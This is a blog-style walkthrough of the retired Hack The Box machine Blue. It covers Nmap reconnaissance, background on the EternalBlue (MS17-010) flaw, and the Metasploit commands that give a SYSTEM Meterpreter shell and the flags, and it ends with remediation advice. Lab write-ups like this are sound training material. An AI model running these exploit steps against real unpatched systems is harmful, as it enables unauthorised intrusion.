Keep Calm and Hack The Box – Blue

Greetings, fellow hackers! Today, we embark on an exciting journey into the realm of Hack The Box (HTB), an online platform that allows cybersecurity enthusiasts to test and sharpen their penetration testing skills. HTB offers a plethora of challenges that simulate real-world scenarios, ranging from easy to mind-bendingly difficult.

In this post, we‘ll be exploring the retired machine named Blue. Don‘t let the name fool you – while it may be one of the easier boxes on HTB, it showcases the notorious EternalBlue exploit, which was used in the devastating WannaCry ransomware attacks that crippled companies worldwide. So put on your hacker hat and grab your trusty Kali Linux box, because we‘re about to dive in!

Step 1: Recon Like a Pro

Before we start throwing exploits left and right, we need to do some reconnaissance. This crucial step helps us gather information about our target and identify potential entry points. Remember, a skilled hacker spends more time in recon than actual exploitation!

Our weapon of choice for reconnaissance is the almighty Nmap (Network Mapper). This versatile tool allows us to discover hosts, scan for open ports, and fingerprint services. Let‘s kick things off with an aggressive scan of the Blue machine:

nmap -A -v blue.htb

The -A flag enables advanced scanning options like OS detection and version scanning, while -v increases the verbosity of the output. Grab a cup of coffee while Nmap does its magic.

The results reveal some juicy details:

  • The target is running Windows 7 Professional (build 7601)
  • Port 445 (SMB) is open, and the machine is running SMBv2.1
  • The computer name is haris-PC

SMB (Server Message Block) is a protocol used for file sharing on Windows networks. Seeing it open piques our interest, as it has a history of notorious vulnerabilities.

Let‘s confirm if the Blue machine is vulnerable to the infamous EternalBlue exploit (MS17-010) using an Nmap script:

nmap --script vuln -p 445 blue.htb  

Bingo! The script confirms that the machine is likely vulnerable to the remote code execution vulnerability in SMBv1. We‘ve found our entry point!

EternalBlue: The Exploit That Shook the World

Before we unleash EternalBlue on the Blue machine, let‘s take a moment to understand its significance. Developed by the U.S. National Security Agency (NSA), EternalBlue exploits a vulnerability (CVE-2017-0144) in Microsoft‘s implementation of the Server Message Block (SMB) protocol.

In layman‘s terms, it allows an attacker to execute arbitrary code on a target machine through a flaw in the way SMBv1 handles specially crafted packets. This can lead to remote code execution with SYSTEM privileges, effectively giving the attacker full control over the machine.

The exploit was leaked by the Shadow Brokers hacker group in April 2017, a month after Microsoft released patches for the vulnerability. However, many organizations were slow to patch, leading to the global spread of the WannaCry ransomware that leveraged EternalBlue to devastating effect.

The incident highlighted the importance of timely patching and the risks associated with legacy protocols like SMBv1. It was a wake-up call for organizations to prioritize cybersecurity and adopt a proactive approach to vulnerability management.

Unleashing EternalBlue on the Blue Machine

Now that we understand the gravity of EternalBlue, let‘s use it to compromise the Blue machine. We‘ll harness the power of Metasploit, a framework that makes exploitation a breeze.

Fire up Metasploit on your Kali Linux box and search for EternalBlue-related modules:

msf> search eternalblue

The search reveals several modules, but we‘re interested in the one specifically targeting Windows 7 and Server 2008 R2 (which matches our target):

msf> use exploit/windows/smb/ms17_010_eternalblue

Let‘s check the options and set the necessary parameters:

msf exploit(ms17_010_eternalblue) > show options

We need to set the RHOST (target IP) and LHOST (our Kali IP). You can find your HTB VPN IP address in the access page.

msf exploit(ms17_010_eternalblue) > set RHOST 10.10.10.40
msf exploit(ms17_010_eternalblue) > set LHOST 10.10.14.24

Double-check the settings and let‘s rock and roll!

msf exploit(ms17_010_eternalblue) > run

If all goes well, you should see a flurry of activity as the exploit does its magic. And voila! We‘ve got a Meterpreter shell with SYSTEM privileges. Feel the power coursing through your veins!

Flag Hunting: Capturing the User and Root Flags

With our shiny Meterpreter shell, it‘s time to hunt for those coveted flags. Let‘s start by checking our user context:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

We‘re already running with SYSTEM privileges, which is the highest level of access on a Windows machine. This means we have unrestricted access to all files and resources. Let the flag hunt begin!

User Flag:

  1. Navigate to the C:\Users\haris\Desktop directory
  2. Locate the user.txt file and display its contents
meterpreter > cd C:\\Users\\haris\\Desktop 
meterpreter > cat user.txt

Root Flag:

  1. Navigate to the C:\Users\Administrator\Desktop directory
  2. Locate the root.txt file and display its contents
meterpreter > cd C:\\Users\\Administrator\\Desktop
meterpreter > cat root.txt  

Congratulations! You‘ve successfully owned the Blue machine and captured both flags. Take a moment to bask in the glory of your accomplishment!

Lessons Learned and Remediations

While hacking the Blue machine was an exhilarating experience, it‘s crucial to understand the real-world implications and learn from them. Here are some key takeaways and remediation steps:

  1. Patch Management: The Blue machine was vulnerable because it was missing the MS17-010 patch. Organizations must have a robust patch management process to ensure timely deployment of security updates. Regularly assess systems for missing patches and prioritize critical ones.

  2. Disable SMBv1: SMBv1 is an outdated and insecure protocol. Modern Windows versions have SMBv2 and SMBv3, which offer improved performance and security. Disable SMBv1 if it‘s not explicitly required to reduce the attack surface.

  3. Network Segmentation: Implement network segmentation to limit the lateral movement of attackers. Use firewalls and VLANs to separate critical assets and restrict access between network segments. This can contain the impact of a breach.

  4. Principle of Least Privilege: Assign users and services the minimum privileges required to perform their tasks. Avoid using administrative accounts for daily activities. This limits the damage an attacker can cause if they manage to compromise a user account.

  5. Monitor and Detect: Implement security monitoring solutions to detect and alert on suspicious activities, such as anomalous SMB traffic or unauthorized file access attempts. Regularly review logs and investigate any deviations from the baseline.

  6. Educate and Train: Foster a culture of cybersecurity awareness among employees. Conduct regular training sessions on identifying and reporting suspicious activities, such as phishing attempts or unusual system behavior. Informed employees can act as an additional line of defense.

Conclusion

Hacking the Blue machine on Hack The Box has been an enlightening journey. We explored the infamous EternalBlue exploit, which exploited a vulnerability in SMBv1 to gain remote code execution. We leveraged the power of Nmap for reconnaissance, Metasploit for exploitation, and Meterpreter for post-exploitation.

But beyond the thrill of capturing flags, we learned valuable lessons about the importance of timely patching, disabling insecure protocols, implementing network segmentation, and adhering to the principle of least privilege. As aspiring cybersecurity professionals, it‘s our responsibility to not only sharpen our technical skills but also understand the broader context and implications of the vulnerabilities we exploit.

Remember, ethical hacking is about more than just breaking into systems. It‘s about learning from our findings, promoting best practices, and ultimately making the digital world a safer place. So keep calm, hack responsibly, and never stop learning!

Until next time, fellow hackers. May your exploits be successful, and your flags be plentiful!

Similar Posts